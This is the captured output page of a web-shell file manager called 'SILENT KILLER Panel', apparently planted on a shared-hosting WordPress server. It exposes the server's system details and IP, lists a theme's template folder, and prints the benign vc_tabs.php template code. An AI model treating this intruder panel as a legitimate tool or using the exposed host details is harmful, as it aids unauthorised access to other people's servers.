SILENT KILLERPanel

Current Path: > home > > transcarter > www > wp-content > themes > bridge > vc_templates


Operation   : Linux host59.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Software     : Apache
Server IP    : 198.54.126.42 | Your IP: 216.73.216.135
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home//transcarter/www/wp-content/themes/bridge/vc_templates

NameTypeSizeLast ModifiedActions
animated_icon_with_text.php File 677 bytes March 10 2023 20:42:14.
animated_icons_with_text.php File 291 bytes March 10 2023 20:42:14.
qode_circle.php File 1148 bytes March 10 2023 20:42:14.
qode_circles.php File 491 bytes March 10 2023 20:42:14.
qode_client.php File 342 bytes March 10 2023 20:42:14.
qode_clients.php File 715 bytes March 10 2023 20:42:14.
qode_content_slider.php File 1546 bytes March 10 2023 20:42:14.
qode_content_slider_item.php File 168 bytes March 10 2023 20:42:14.
qode_elements_holder.php File 1335 bytes March 10 2023 20:42:14.
qode_elements_holder_item.php File 4204 bytes March 10 2023 20:42:14.
qode_horizontal_marquee.php File 662 bytes March 10 2023 20:42:14.
qode_horizontal_marquee_item.php File 421 bytes March 10 2023 20:42:14.
qode_in_device_slider.php File 916 bytes March 10 2023 20:42:14.
qode_in_device_slider_item.php File 319 bytes March 10 2023 20:42:14.
qode_preview_slider.php File 933 bytes March 10 2023 20:42:14.
qode_preview_slider_item.php File 343 bytes March 10 2023 20:42:14.
qode_pricing_list.php File 204 bytes March 10 2023 20:42:14.
qode_pricing_list_item.php File 753 bytes March 10 2023 20:42:14.
qode_pricing_table.php File 740 bytes March 10 2023 20:42:14.
qode_pricing_tables.php File 283 bytes March 10 2023 20:42:14.
qode_vertical_left_sliding_panel.php File 149 bytes March 10 2023 20:42:14.
qode_vertical_right_sliding_panel.php File 150 bytes March 10 2023 20:42:14.
qode_vertical_slide_content_item.php File 1331 bytes March 10 2023 20:42:14.
qode_vertical_split_slider.php File 332 bytes March 10 2023 20:42:14.
vc_accordion.php File 1440 bytes March 10 2023 20:42:14.
vc_accordion_tab.php File 1904 bytes March 10 2023 20:42:14.
vc_column_text.php File 2003 bytes March 10 2023 20:42:14.
vc_empty_space.php File 1869 bytes March 10 2023 20:42:14.
vc_gallery.php File 14755 bytes March 10 2023 20:42:14.
vc_row.php File 13828 bytes March 10 2023 20:42:14.
vc_row_inner.php File 13599 bytes March 10 2023 20:42:14.
vc_separator.php File 1422 bytes March 10 2023 20:42:14.
vc_single_image.php File 11594 bytes March 10 2023 20:42:14.
vc_tab.php File 802 bytes March 10 2023 20:42:14.
vc_tabs.php File 2675 bytes March 10 2023 20:42:14.
vc_text_separator.php File 1099 bytes March 10 2023 20:42:14.

Reading File: /home//transcarter/www/wp-content/themes/bridge/vc_templates/vc_tabs.php

<?php
$output = $title = $interval = $el_class = $style = '';
extract(shortcode_atts(array(
    'title' => '',
    'interval' => 0,
    'el_class' => '',
	'style' => 'horizontal'
), $atts));

wp_enqueue_script('jquery-ui-tabs');

$el_class = $this->getExtraClass($el_class);

$element = 'wpb_tabs';
if ( 'vc_tour' == $this->shortcode) $element = 'wpb_tour';

// Extract tab titles
preg_match_all( '/vc_tab title="([^\"]+)"(\stab_id\=\"([^\"]+)\"){0,1}/i', $content, $matches, PREG_OFFSET_CAPTURE );
$tab_titles = array();

/**
 * vc_tabs
 *
 */
if ( isset($matches[0]) ) { $tab_titles = $matches[0]; }
$tabs_nav = '';
$tabs_nav .= '<ul class="tabs-nav">';
foreach ( $tab_titles as $tab ) {
    preg_match('/title="([^\"]+)"(\stab_id\=\"([^\"]+)\"){0,1}/i', $tab[0], $tab_matches, PREG_OFFSET_CAPTURE );
    if(isset($tab_matches[1][0])) {
        $tabs_nav .= '<li><a href="#tab-'. (isset($tab_matches[3][0]) ? $tab_matches[3][0] : sanitize_title( $tab_matches[1][0] ) ) .'">' . $tab_matches[1][0] . '</a></li>';

    }
}
$tabs_nav .= '</ul>'."\n";

$css_class =  apply_filters(VC_SHORTCODE_CUSTOM_CSS_FILTER_TAG, trim($element.'tabs_holder clearfix '.$el_class), $this->settings['base']);

switch($style) {
    case 'boxed':
        $style_class = 'boxed';
        break;
    case 'vertical_left':
        $style_class = 'vertical left';
        break;
    case 'vertical_right':
        $style_class = 'vertical right';
        break;
    case 'horizontal':
        $style_class = 'horizontal center';
        break;
    case 'horizontal_left':
        $style_class = 'horizontal left';
        break;
    case 'horizontal_right':
        $style_class = 'horizontal right';
        break;
}

$output .= "\n\t".'<div class="'.$css_class.'" data-interval="'.$interval.'">';
$output .= "\n\t\t".'<div class="q_tabs ' . $style_class . '">';
$output .= wpb_widget_title(array('title' => $title, 'extraclass' => $element.'_heading'));
$output .= "\n\t\t\t".$tabs_nav;
$output .= "<div class='tabs-container'>";
$output .= "\n\t\t\t".wpb_js_remove_wpautop($content);
$output .= "</div>";
if ( 'vc_tour' == $this->shortcode) {
    $output .= "\n\t\t\t" . '<div class="wpb_tour_next_prev_nav clearfix"> <span class="wpb_prev_slide"><a href="#prev" title="'.esc_html__('Previous slide', 'bridge').'">'.esc_html__('Previous slide', 'bridge').'</a></span> <span class="wpb_next_slide"><a href="#next" title="'.esc_html__('Next slide', 'bridge').'">'.esc_html__('Next slide', 'bridge').'</a></span></div>';
}
$output .= "\n\t\t".'</div> '.$this->endBlockComment('.wpb_wrapper');
$output .= "\n\t".'</div> '.$this->endBlockComment($element);

echo bridge_qode_get_module_part( $output );

SILENT KILLER Tool